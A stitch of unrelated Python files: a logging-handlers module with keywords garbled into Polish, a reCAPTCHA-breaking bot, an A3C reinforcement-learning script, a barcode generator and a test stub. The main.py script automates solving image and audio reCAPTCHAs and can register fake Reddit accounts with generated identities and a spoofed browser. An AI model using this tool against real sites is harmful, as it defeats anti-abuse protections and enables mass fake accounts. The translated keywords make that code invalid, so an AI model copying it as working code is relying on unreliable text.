Return the event category dla the record.
Override this jeżeli you want to specify your own categories. This version
returns 0.
"""
zwróć 0
def getEventType(self, record):
"""
Return the event type dla the record.
Override this jeżeli you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which jest set up w
__init__() to a dictionary which contains mappings dla DEBUG, INFO,
WARNING, ERROR oraz CRITICAL. If you are using your own levels you will
either need to override this method albo place a suitable dictionary w
the handler's typemap attribute.
"""
zwróć self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category oraz event type. Then
log the message w the NT event log.
"""
jeżeli self._welu:
spróbuj:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
wyjąwszy Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name z the registry jako a
source of event log entries. However, jeżeli you do this, you will
nie be able to see the events jako you intended w the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
klasa HTTPHandler(logging.Handler):
"""
A klasa which sends records to a Web server, using either GET albo
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=Nieprawda, credentials=Nic,
context=Nic):
"""
Initialize the instance przy the host, the request URL, oraz the method
("GET" albo "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
jeżeli method nie w ["GET", "POST"]:
podnieś ValueError("method must be GET albo POST")
jeżeli nie secure oraz context jest nie Nic:
podnieś ValueError("context parameter only makes sense "
"przy secure=Prawda")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that jest sent jako the CGI data. Overwrite w your class.
Contributed by Franz Glasner.
"""
zwróć record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server jako a percent-encoded dictionary
"""
spróbuj:
zaimportuj http.client, urllib.parse
host = self.host
jeżeli self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
inaczej:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
jeżeli self.method == "GET":
jeżeli (url.find('?') >= 0):
sep = '&'
inaczej:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port z host, jeżeli present
i = host.find(":")
jeżeli i >= 0:
host = host[:i]
h.putheader("Host", host)
jeżeli self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
jeżeli self.credentials:
zaimportuj base64
s = ('u%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip()
h.putheader('Authorization', s)
h.endheaders()
jeżeli self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything przy the result
wyjąwszy Exception:
self.handleError(record)
klasa BufferingHandler(logging.Handler):
"""
A handler klasa which buffers logging records w memory. Whenever each
record jest added to the buffer, a check jest made to see jeżeli the buffer should
be flushed. If it should, then flush() jest expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler przy the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true jeżeli the buffer jest up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
zwróć (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
jeżeli self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
spróbuj:
self.buffer = []
w_końcu:
self.release()
def close(self):
"""
Close the handler.
This version just flushes oraz chains to the parent class' close().
"""
spróbuj:
self.flush()
w_końcu:
logging.Handler.close(self)
klasa MemoryHandler(BufferingHandler):
"""
A handler klasa which buffers logging records w memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
jest full, albo when an event of a certain severity albo greater jest seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=Nic):
"""
Initialize the handler przy the buffer size, the level at which
flushing should occur oraz an optional target.
Note that without a target being set either here albo via setTarget(),
a MemoryHandler jest no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check dla buffer full albo a record at the flushLevel albo higher.
"""
zwróć (len(self.buffer) >= self.capacity) albo \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler dla this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, jeżeli there jest one. Override jeżeli you want
different behaviour.
The record buffer jest also cleared by this operation.
"""
self.acquire()
spróbuj:
jeżeli self.target:
dla record w self.buffer:
self.target.handle(record)
self.buffer = []
w_końcu:
self.release()
def close(self):
"""
Flush, set the target to Nic oraz lose the buffer.
"""
spróbuj:
self.flush()
w_końcu:
self.acquire()
spróbuj:
self.target = Nic
BufferingHandler.close(self)
w_końcu:
self.release()
klasa QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
przy a multiprocessing Queue to centralise logging to file w one process
(in a multi-process application), so jako to avoid file write contention
between processes.
This code jest new w Python 3.2, but this klasa can be copy pasted into
user code dla use przy earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the dalejed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method jeżeli you want to use blocking, timeouts albo custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record dla queuing. The object returned by this method jest
enqueued.
The base implementation formats the record to merge the message
oraz arguments, oraz removes unpickleable items z the record
in-place.
You might want to override this method jeżeli you want to convert
the record to a dict albo JSON string, albo send a modified copy
of the record dopóki leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (jeżeli there's exception data), oraz also puts the message into
# record.message. We can then use this to replace the original
# msg + args, jako these might be unpickleable. We also zap the
# exc_info attribute, jako it's no longer needed and, jeżeli nie Nic,
# will typically nie be pickleable.
self.format(record)
record.msg = record.message
record.args = Nic
record.exc_info = Nic
zwróć record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it dla pickling first.
"""
spróbuj:
self.enqueue(self.prepare(record))
wyjąwszy Exception:
self.handleError(record)
jeżeli threading:
klasa QueueListener(object):
"""
This klasa implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them oraz dalejes them to a
list of handlers dla processing.
"""
_sentinel = Nic
def __init__(self, queue, *handlers, respect_handler_level=Nieprawda):
"""
Initialise an instance przy the specified queue oraz
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = Nic
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record oraz zwróć it, optionally blocking.
The base implementation uses get. You may want to override this method
jeżeli you want to use timeouts albo work przy custom queue implementations.
"""
zwróć self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(Prawda)
t.start()
def prepare(self , record):
"""
Prepare a record dla handling.
This method just returns the dalejed-in record. You may want to
override this method jeżeli you need to do any custom marshalling albo
manipulation of the record before dalejing it to the handlers.
"""
zwróć record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
dla handler w self.handlers:
jeżeli nie self.respect_handler_level:
process = Prawda
inaczej:
process = record.levelno >= handler.level
jeżeli process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue dla records, oraz ask the handler
to deal przy them.
This method runs on a separate, internal thread.
The thread will terminate jeżeli it sees a sentinel object w the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
dopóki nie self._stop.isSet():
spróbuj:
record = self.dequeue(Prawda)
jeżeli record jest self._sentinel:
przerwij
self.handle(record)
jeżeli has_task_done:
q.task_done()
wyjąwszy queue.Empty:
dalej
# There might still be records w the queue.
dopóki Prawda:
spróbuj:
record = self.dequeue(Nieprawda)
jeżeli record jest self._sentinel:
przerwij
self.handle(record)
jeżeli has_task_done:
q.task_done()
wyjąwszy queue.Empty:
przerwij
def enqueue_sentinel(self):
"""
This jest used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method jeżeli you want to use timeouts albo work przy custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, oraz then waits dla it to do so.
Note that jeżeli you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = Nic
|
main.py | from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from bs4 import BeautifulSoup
from random import uniform
from time import sleep
from faker import Faker
from scipy.io import wavfile
import sys
import logging
import random
import os
import urllib
import time
import audio
import threading
import argparse
# use the max amplitude to filter out pauses
AMP_THRESHOLD = 2500
ATTACK_AUDIO = False
ATTACK_IMAGES = True
ATTACK_REDDIT = False
CHROMEDRIVER_PATH = ""
LEVEL = logging.DEBUG
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument("--image", action='store_true', help="attack image recaptcha")
group.add_argument("--audio", action='store_true', help="attack audio recaptcha")
parser.add_argument("--driver", action="store", help="specify custom chromedriver path")
parser.add_argument("--reddit", action="store_true", help="run attack against Reddit's recaptcha")
parser.add_argument("--level", action="store", help="set log level", default="debug", choices=("debug", "warning"))
args = parser.parse_args()
ATTACK_IMAGES = args.image
ATTACK_AUDIO = args.audio
ATTACK_REDDIT = args.reddit
CHROMEDRIVER_PATH = args.driver
if not ATTACK_AUDIO and not ATTACK_IMAGES:
parser.print_help()
sys.exit()
############################## UTIL FUNCTIONS #############################
def init(task_type):
global TASK_PATH, TASK_DIR, TASK_NUM, TASK
TASK_DIR = os.path.join(task_type, "task")
TASK_NUM = 1
while os.path.isdir(TASK_DIR+str(TASK_NUM)):
TASK_NUM += 1
if not os.path.isdir(TASK_DIR+str(TASK_NUM)):
os.mkdir(TASK_DIR+str(TASK_NUM))
logging.info("Making "+ TASK_DIR+str(TASK_NUM))
TASK = "task"+str(TASK_NUM)
TASK_PATH = os.path.join(task_type, TASK)
def wait_between(a, b):
rand = uniform(a, b)
sleep(rand)
############################## IMAGE RECAPTCHA ##############################
TASK_PATH = "images/taskg"
def should_click_image(img, x1, y1, store):
ans = ris.parse_clarifai(ris.clarifai(img))
logging.debug(ans)
decision = "car" in ans or "vehicle" in ans or "truck" in ans
store[(x1,y1)] = decision
logging.debug(store)
return decision
def click_tiles(driver, coords):
orig_srcs, new_srcs = {}, {}
for (x, y) in coords:
logging.debug("[*] Going to click {} {}".format(x,y))
tile1 = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, '//div[@id="rc-imageselect-target"]/table/tbody/tr[{0}]/td[{1}]'.format(x, y))))
orig_srcs[(x, y)] = driver.find_element(By.XPATH, "//*[@id=\"rc-imageselect-target\"]/table/tbody/tr[{}]/td[{}]/div/div[1]/img".format(x,y)).get_attribute("src")
new_srcs[(x, y)] = orig_srcs[(x, y)] # to check if image has changed
tile1.click()
wait_between(0.1, 0.5)
logging.debug("[*] Downloading new inbound image...")
new_files = {}
for (x, y) in orig_srcs:
while new_srcs[(x, y)] == orig_srcs[(x, y)]:
new_srcs[(x, y)] = driver.find_element(By.XPATH, "//*[@id=\"rc-imageselect-target\"]/table/tbody/tr[{}]/td[{}]/div/div[1]/img".format(x,y)).get_attribute("src")
time.sleep(0.5)
urllib.urlretrieve(new_srcs[(x, y)], "captcha.jpeg")
new_path = TASK_PATH+"/new_output{}{}.jpeg".format(x, y)
os.system("mv captcha.jpeg "+new_path)
new_files[(x, y)] = (new_path)
return new_files
def handle_queue(to_solve_queue, coor_dict):
ts = []
for (x,y) in to_solve_queue:
image_file = to_solve_queue[(x, y)]
t = threading.Thread(target=should_click_image, args=(image_file, x, y,coor_dict))
ts.append(t)
t.start()
for t in ts:
t.join()
def image_recaptcha(driver):
continue_solving = True
while continue_solving:
willing_to_solve = False
while not willing_to_solve:
body = driver.find_element(By.CSS_SELECTOR, "body").get_attribute('innerHTML').encode("utf8")
soup = BeautifulSoup(body, 'html.parser')
table = soup.findAll("div", {"id": "rc-imageselect-target"})[0]
target = soup.findAll("div", {"class": "rc-imageselect-desc"})
if not target: # find the target
target = soup.findAll("div", {"class": "rc-imageselect-desc-no-canonical"})
target = target[0].findAll("strong")[0].get_text()
# Compute shape of captcha & target #
trs = table.findAll("tr")
max_height = len(trs)
max_width = 0
for tr in trs:
imgs = tr.findAll("img")
payload = imgs[0]["src"]
if len(imgs) > max_width:
max_width = len(imgs)
# if its not easy, ask for a new one
if max_height != 3 or max_width != 3 or target != "cars": # lets get an easier one
reload_captcha = driver.find_element(By.XPATH, "//*[@id=\"recaptcha-reload-button\"]")
reload_captcha.click()
wait_between(0.2, 0.5)
else:
willing_to_solve = True
# Pull down catcha to attack and organize directory structure
urllib.urlretrieve(payload, "captcha.jpeg")
os.system("mv captcha.jpeg "+TASK_PATH+"/full_payload.jpeg")
os.system("convert "+TASK_PATH+"/full_payload.jpeg -crop "+str(max_width)+"x"+str(max_width)+"@ +repage +adjoin "+TASK_PATH+"/output_%03d.jpg")
# build queue of files
to_solve_queue = {}
idx = 0
for f in [TASK_PATH+"/"+f for f in os.listdir(TASK_PATH) if "output_" in f]:
y = idx % 3 + 1 # making coordinates 1 indexed to match xpaths
x = idx / 3 + 1
to_solve_queue[(x, y)] = f
idx += 1
logging.debug(to_solve_queue)
coor_dict = {}
handle_queue(to_solve_queue, coor_dict) # multithread builds out where to click
logging.debug(coor_dict)
#os.system("rm "+TASK_PATH+"/full_payload.jpeg")
driver.switch_to.default_content()
iframe = driver.find_element(By.XPATH, "/html/body/div/div[4]/iframe")
driver.switch_to.frame(iframe)
continue_solving = True
while continue_solving:
to_click_tiles = []
for coords in coor_dict:
to_click = coor_dict[coords]
x, y = coords
body = driver.find_element(By.CSS_SELECTOR, "body").get_attribute('innerHTML').encode("utf8")
if to_click:
to_click_tiles.append((x,y)) # collect all the tiles to click in this round
new_files = click_tiles(driver, to_click_tiles)
handle_queue(new_files, coor_dict)
continue_solving = False
for to_click_tile in coor_dict.values():
continue_solving = to_click_tile or continue_solving
driver.find_element(By.ID, "recaptcha-verify-button").click()
wait_between(0.2, 0.5)
if driver.find_element_by_class_name("rc-imageselect-incorrect-response").get_attribute("style") != "display: none":
continue_solving = True
else:
print "Think I'm done here!"
############################## AUDIO RECAPTCHA ##############################
def test_all(start=100, end=101):
global TASK_PATH
TASK_TYPE = "data"
timings = []
for task_num in range(start, end):
try:
TASK = "task"+str(task_num)
TASK_PATH = TASK_TYPE+"/"+TASK
AUDIO_FILE = TASK_PATH+"/"+TASK #+ ".mp3"
num_str, time = get_numbers(AUDIO_FILE, TASK_PATH+"/")
print(num_str, time)
timings.append(time)
except:
pass
print timings
print sum(timings)/float(len(timings))
def get_numbers(audio_file, parent_dir):
global AMP_THRESHOLD
mp3_file = audio_file + ".mp3"
wav_file = audio_file + ".wav"
print("converting from " + mp3_file + " to " + wav_file)
os.system("echo 'y' | ffmpeg -i "+mp3_file+" "+wav_file + "&> /dev/null")
# split audio file on silence
os.system("sox -V3 "+wav_file+" "+audio_file+"_.wav silence -l 0 1 0.5 0.1% : newfile : restart &> /dev/null")
files = [f for f in os.listdir(parent_dir) if "_0" in f]
audio_filenames = []
# remove audio files that are only silence
for f in files:
_, snd = wavfile.read(TASK_PATH + "/" + f)
amp = max(snd)
print(f + ":" + str(amp))
if amp > AMP_THRESHOLD: # skip this file
audio_filenames.append(parent_dir+f)
else:
os.system("rm " + parent_dir+f)
# run speech recognition on the individual numbers
# num_str = ""
# for f in sorted(audio_filenames):
# print f
# num_str += str(audio.getNum(f))
# print(num_str)
return audio.getNums(TASK_PATH, audio_filenames)
def type_like_bot(driver, element, string):
driver.find_element(By.ID, element).send_keys(string)
wait_between(0.5, 2)
def type_like_human(driver, element, string):
driver.find_element(By.ID, element).click()
for c in string:
driver.find_element(By.ID, element).send_keys(c)
wait_between(0.0, 0.1)
wait_between(0.5, 2)
type_style = type_like_bot
def fill_out_profile(driver):
fake = Faker()
user = fake.simple_profile()
username = user["username"]
email = user["mail"].replace("@", str(random.randint(10000, 99999))+"@")
password = fake.password()
wait_between(1, 2)
type_style(driver, "user_reg", username)
type_style(driver, "passwd_reg", password)
type_style(driver, "passwd2_reg", password)
type_style(driver, "email_reg", email)
############################## MAIN ##############################
def main():
logging.basicConfig(stream=sys.stderr, level=LEVEL)
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument("--disable-bundled-ppapi-flash")
chrome_options.add_argument("--incognito")
chrome_options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36")
chrome_options.add_argument("--disable-plugins-discovery")
if CHROMEDRIVER_PATH:
driver = webdriver.Chrome(CHROMEDRIVER_PATH, chrome_options=chrome_options)
logging.debug("[*] Starting custom chromedriver %s" % CHROMEDRIVER_PATH)
else:
driver = webdriver.Chrome(chrome_options=chrome_options)
logging.debug("[*] Starting system default chromedriver")
driver = webdriver.Chrome(chrome_options=chrome_options)
driver.delete_all_cookies()
agent = driver.execute_script("return navigator.userAgent")
logging.debug("[*] Cookies cleared")
logging.debug("[ ] Starting driver with user agent %s" % agent)
if ATTACK_REDDIT:
logging.info("[*] Starting attack on Reddit's recaptcha")
driver.get("http://reddit.com")
driver.find_element(By.XPATH, "//*[@id=\"header-bottom-right\"]/span[1]/a").click()
logging.debug("[*] Filling out Reddit registration form")
fill_out_profile(driver)
WebDriverWait(driver, 60).until(EC.visibility_of_element_located((By.XPATH, "//*[@id=\"register-form\"]/div[6]/div/div/div/iframe")))
iframeSwitch = driver.find_element(By.XPATH, "//*[@id=\"register-form\"]/div[6]/div/div/div/iframe")
else:
logging.info("[*] Starting attack on local site")
driver.get("localhost:8000/site.html")
iframeSwitch = driver.find_element(By.XPATH, "//*[@id=\"captcha\"]/div/div/iframe")
driver.delete_all_cookies()
driver.switch_to.frame(iframeSwitch)
#ActionChains(driver).move_to_element(iframeSwitch).perform()
driver.delete_all_cookies()
logging.info("[*] Recaptcha located. Engaging")
WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "recaptcha-anchor")))
ele = driver.find_element(By.ID, "recaptcha-anchor")
#ActionChains(driver).move_to_element(ele).perform()
ele.click()
driver.switch_to.default_content()
WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.CSS_SELECTOR, "iframe[title=\"recaptcha challenge\"]")))
iframe = driver.find_element(By.CSS_SELECTOR, "iframe[title=\"recaptcha challenge\"]")
driver.switch_to.frame(iframe)
WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "rc-imageselect")))
if ATTACK_IMAGES:
image_recaptcha(driver)
elif ATTACK_AUDIO:
WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "recaptcha-audio-button")))
time.sleep(1)
driver.find_element(By.ID, "recaptcha-audio-button").click()
guess_again = True
while guess_again:
init("audio")
WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "audio-source")))
# Parse table details offline
body = driver.find_element(By.CSS_SELECTOR, "body").get_attribute('innerHTML').encode("utf8")
soup = BeautifulSoup(body, 'html.parser')
link = soup.findAll("a", {"class": "rc-audiochallenge-tdownload-link"})[0]
urllib.urlretrieve(link["href"], TASK_PATH + "/" + TASK + ".mp3")
guess_str = get_numbers(TASK_PATH + "/" + TASK, TASK_PATH + "/")
type_style(driver, "audio-response", guess_str)
# results.append(guess_str)
wait_between(0.5, 3)
driver.find_element(By.ID, "recaptcha-verify-button").click()
wait_between(1, 2.5)
try:
logging.debug("Checking if Google wants us to solve more...")
driver.switch_to.default_content()
driver.switch_to.frame(iframeSwitch)
checkmark_pos = driver.find_element(By.CLASS_NAME, "recaptcha-checkbox-checkmark").get_attribute("style")
guess_again = not (checkmark_pos == "background-position: 0 -600px")
driver.switch_to.default_content()
iframe = driver.find_element(By.CSS_SELECTOR, "iframe[title=\"recaptcha challenge\"]")
driver.switch_to.frame(iframe)
except Exception as e:
print e
guess_again = False
input("")
main()
# test_all()
|
A3C.py | """
Asynchronous Advantage Actor Critic (A3C), Reinforcement Learning.
The BipedalWalker example.
View more on [莫烦Python] : https://morvanzhou.github.io/2_tensorflow_old/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
GAME = 'BipedalWalker-v2'
OUTPUT_GRAPH = False
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()
MAX_GLOBAL_EP = 8000
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10
GAMMA = 0.99
ENTROPY_BETA = 0.005
LR_A = 0.00005 # 1_tensorflow_new rate for actor
LR_C = 0.0001 # 1_tensorflow_new rate for critic
GLOBAL_RUNNING_R = []
GLOBAL_EP = 0
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
del env
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self._build_net()
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v = self._build_net()
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
self.test = sigma[0]
mu, sigma = mu * A_BOUND[1], sigma + 1e-5
normal_dist = tf.contrib.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * td
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1)), *A_BOUND)
with tf.name_scope('local_grad'):
self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self):
w_init = tf.contrib.layers.xavier_initializer()
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='la')
l_a = tf.layers.dense(l_a, 300, tf.nn.relu6, kernel_initializer=w_init, name='la2')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='lc')
l_c = tf.layers.dense(l_c, 300, tf.nn.relu6, kernel_initializer=w_init, name='lc2')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
return mu, sigma, v
def update_global(self, feed_dict): # run by a local
_, _, t = SESS.run([self.update_a_op, self.update_c_op, self.test], feed_dict) # local grads applies to global net
return t
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME)
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
while True:
if self.name == 'W_0' and total_step % 30 == 0:
self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
if r == -100: r = -2
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append(r)
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
test = self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
achieve = '| Achieve' if self.env.unwrapped.hull.position[0] >= 88 else '| -------'
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.95 * GLOBAL_RUNNING_R[-1] + 0.05 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
achieve,
"| Pos: %i" % self.env.unwrapped.hull.position[0],
"| RR: %.1f" % GLOBAL_RUNNING_R[-1],
'| EpR: %.1f' % ep_r,
'| var:', test,
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
import matplotlib.pyplot as plt
plt.plot(GLOBAL_RUNNING_R)
plt.xlabel('episode')
plt.ylabel('global running reward')
plt.show()
|
generate_clean_barcodes.py | from tqdm import tqdm
import pickle
import numpy as np
import treepoem
import string
import random
import argparse
import multiprocessing as mp
parser = argparse.ArgumentParser(description='Generate clean barcodes.')
parser.add_argument('--num_processes', '-n', type=int, default=6,
help='Number of processes used for image generation')
parser.add_argument('--size', '-s', type=int, default=30000,
help='Number of training images to be generated')
args = parser.parse_args()
def createCleanBarcode(codeType='random'):
barcode_types = {
'upca':{'size':11, 'H':146, 'W':190},
'ean13':{'size':12, 'H':146, 'W':190},
'qrcode':{'size':50, 'H':102, 'W':102},
'pdf417':{'size':50, 'H':62, 'W':242}
}
if codeType == 'random':
codeType = np.random.choice(list(barcode_types))
letters = string.digits
data = ''.join(random.choice(letters) for i in range(barcode_types[codeType]['size']))
generated = treepoem.generate_barcode(barcode_type=codeType, data=data).convert('1')
# convert PIL Image to array
arr = np.array(generated).astype(np.int)
arr[arr==1] = 255
return arr
def generate(ind, length):
clean_barcodes = []
for i in tqdm(range(length)):
clean_barcodes.append(createCleanBarcode())
with open("clean_barcodes_{}.pickle".format(ind), 'wb') as f:
pickle.dump(clean_barcodes, f)
if __name__ == '__main__':
step = args.size // args.num_processes
processes = []
for i in range(args.num_processes):
processes.append(mp.Process(target=generate, args=(i, step, )))
for p in processes:
p.start()
for p in processes:
p.join()
all_barcodes = []
for i in range(args.num_processes):
with open("clean_barcodes_{}.pickle".format(i), 'rb') as f:
all_barcodes += pickle.load(f)
with open("clean_barcodes.pickle", 'wb') as f:
pickle.dump(all_barcodes, f)
print("Data generation finished.") |
test_sys.py | import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
